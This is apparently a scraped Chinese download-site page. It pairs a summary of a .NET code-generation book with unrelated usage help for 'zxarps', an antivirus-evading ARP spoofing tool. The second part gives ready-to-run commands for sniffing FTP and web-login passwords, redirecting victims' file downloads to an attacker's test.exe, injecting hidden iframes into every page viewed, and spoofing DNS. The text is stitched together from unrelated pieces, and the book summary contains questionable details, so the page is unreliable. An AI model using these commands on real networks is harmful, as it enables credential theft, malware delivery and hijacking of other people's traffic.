.NET实用代码生成:Visual Studio 2005-2010实践指南

5星 · 超过95%的资源 需积分: 0 39 下载量 19 浏览量 更新于2024-07-26 收藏 3.05MB PDF 举报
".NET实用代码生成:Practical_Code_Generation_in_NET是一本专为.NET开发人员编写的指南,涵盖了Visual Studio® 2005、2008和2010版本的内容。作者Peter Vogel以其丰富的经验和深入理解,向读者展示了如何在.NET平台上高效地利用代码生成技术。本书主题聚焦于实践应用,旨在帮助开发者提升代码质量,提高开发效率,同时探讨了自动化工具在项目中的角色,包括代码模板、反射和代码生成库的使用。 书中详细介绍了以下关键知识点: 1. **Visual Studio集成支持**:书中涵盖了Visual Studio不同版本的特性,说明了如何利用这些IDE的强大功能来自动化代码生成过程,例如自动生成控制器、视图、以及ORM映射等。 2. **代码模板**:介绍了如何创建和使用代码模板,这是一种快速生成符合特定设计模式或架构的代码片段的方式,可以节省大量重复劳动。 3. **反射API**:讲解了如何通过.NET的反射机制动态创建、修改和执行代码,这对于根据运行时条件生成代码非常有用。 4. **代码生成库**:推荐了一些常用的.NET代码生成库,如T4模板(Text Template Transformation Toolkit)、CodeSmith和NSubstitute,以及它们各自的优缺点和适用场景。 5. **最佳实践与注意事项**:书中还强调了代码生成时的潜在问题,如性能影响、代码可维护性、以及如何避免生成过复杂的逻辑,确保生成的代码易于理解和调试。 6. **版权和免责声明**:书中的内容遵循版权法,制造商和卖家可能对某些产品名称有商标保护,使用时应尊重知识产权。此外,作者和出版商对书中信息的准确性不承担明示或暗示的保证,也不对因使用书中的信息或程序导致的偶然或间接损失负责。 7. **批量购买优惠**:出版社提供针对批量购买或定制封面和内容的折扣,适用于企业培训、市场推广和品牌定制的需求。 Practical_Code_Generation_in_NET是一本实用的参考书籍,为.NET开发者提供了强大的工具和技术,助其在日常开发工作中实现代码生成的自动化,从而提高生产力并优化代码结构。"
2012-05-11 上传
zxarps免杀版 -idx [index] 网卡索引号 -ip [ip] 欺骗的IP,用'-'指定范围,','隔开 -sethost [ip] 默认是网关,可以指定别的IP -port [port] 关注的端口,用'-'指定范围,','隔开,没指定默认关注所有端口 -reset 恢复目标机的ARP表 -hostname 探测主机时获取主机名信息 -logfilter [string]设置保存数据的条件,必须+-_做前缀,后跟关键字, ','隔开关键字,多个条件'|'隔开 所有带+前缀的关键字都出现的包则写入文件 带-前缀的关键字出现的包不写入文件 带_前缀的关键字一个符合则写入文件(如有+-条件也要符合) -save_a [filename] 将捕捉到的数据写入文件 ACSII模式 -save_h [filename] HEX模式 -hacksite [ip] 指定要插入代码的站点域名或IP, 多个可用','隔开,没指定则影响所有站点 -insert [html code]指定要插入html代码 -postfix [string] 关注的后缀名,只关注HTTP/1.1 302 -hackURL [url] 发现关注的后缀名后修改URL到新的URL -filename [name] 新URL上有效的资源文件名 -hackdns [string] DNS欺骗,只修改UDP的报文,多个可用','隔开 格式: 域名|IP,www.aa.com|222.22.2.2,www.bb.com|1.1.1.1 -Interval [ms] 定时欺骗的时间间隔,默认是3秒 -spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者 -speed [kb] 限制指定的IP或IP段的网络总带宽,单位:KB example: 嗅探指定的IP段中端口80的数据,并以HEX模式写入文件 zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log FTP嗅探,在21或2121端口中出现USER或PASS的数据包记录到文件 zxarps.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter "_USER ,_PASS" -save_a sniff.log HTTP web邮箱登陆或一些论坛登陆的嗅探,根据情况自行改关键字 zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter "+POST ,+user,+pass" -save_a sniff.log 用|添加嗅探条件,这样FTP和HTTP的一些敏感关键字可以一起嗅探 zxarps.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter "+POST ,+user,+pass|_USER ,_PASS" -save_a sniff.log 如果嗅探到目标下载文件后缀是exe等则更改Location:为http://xx.net/test.exe zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix ".exe,.rar,.zip" -hackurl http://xx.net/ -filename test.exe 指定的IP段中的用户访问到-hacksite中的网址则只显示just for fun zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert "just for fun<noframes>" 指定的IP段中的用户访问的所有网站都插入一个框架代码 zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<8))e src='xx' width=0 height=0>" 指定的两个IP的总带宽限制到20KB zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -speed 20 DNS欺骗 zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -hackdns "www.aa.com|222.22.2.2,www.bb.com|1.1.1.1"